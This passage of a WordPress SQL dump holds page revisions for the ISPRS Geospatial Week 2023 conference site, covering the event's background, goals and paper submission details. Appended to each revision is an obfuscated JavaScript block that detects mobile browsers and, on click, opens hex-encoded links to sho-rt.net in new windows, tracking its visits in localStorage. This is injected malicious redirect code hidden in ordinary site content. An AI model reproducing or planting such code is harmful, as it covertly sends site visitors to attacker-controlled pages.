)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The ISPRS Geospatial Week (GSW)','','inherit','closed','closed','','2631-revision-v1','','','2023-02-05 08:35:15','2023-02-05 08:35:15','',2631,'https://gsw2023.com/?p=3783',0,'revision','',0),
(3784,1,'2023-02-05 08:43:38','2023-02-05 08:43:38','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 14pt; font-family: normal Arial, Helvetica, sans-serif;\">Science, Technology and Maritime Transport acting as local organiser and host The ISPRS Geospatial Week (GSW) is a combination of workshops organised by about 30 ISPRS Working Groups active in areas of interest of ISPRS. It is convened by the Arab Academy for, and led by Prof. Naser El-Sheimy as GSW Director.</span></p>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt; font-family: montssrat, Helvetica, sans-serif;\">The ISPRS Geospatial Week is held biennially in odd years. The GSW 2023 is the fifth edition, after Antalya 2013, Montpellier 2015, Wuhan 2017, and Enschede 2019.</span></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\"><strong>The ISPRS Geospatial Week\'s general goals are to:</strong></span></p>\n<ul class=\"nospace\">\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\">Increase the possibility of communication between the different workshop communities within ISPRS and beyond;</span></p>\n</li>\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\">Increase the continuous visibility of ISPRS on a yearly basis, together with the Congress and the Commission Symposia, thus leading to larger impact for ISPRS activities;</span></p>\n</li>\n<li>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 14pt;\">Gives Sustaining Members a more attractive opportunity to participate in ISPRS events.</span></p>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The ISPRS Geospatial Week (GSW)','','inherit','closed','closed','','2631-revision-v1','','','2023-02-05 08:43:38','2023-02-05 08:43:38','',2631,'https://gsw2023.com/?p=3784',0,'revision','',0),
(3785,1,'2023-02-05 08:54:47','2023-02-05 08:54:47','<p>[vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong>Submit Abstracts/Papers</strong></span></p>\n<p>&nbsp;</p>\n<p>The ISPRS Geospatial Week 2023 (GSW’2023) has been opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2023\"> ConfToool website of the Geospatial Week</a>, authors can submit either a full paper or an extended abstract to one of the 26 Workshops available in GSW’2023</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n</div>\n<div class=\"three_quarter first\">\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 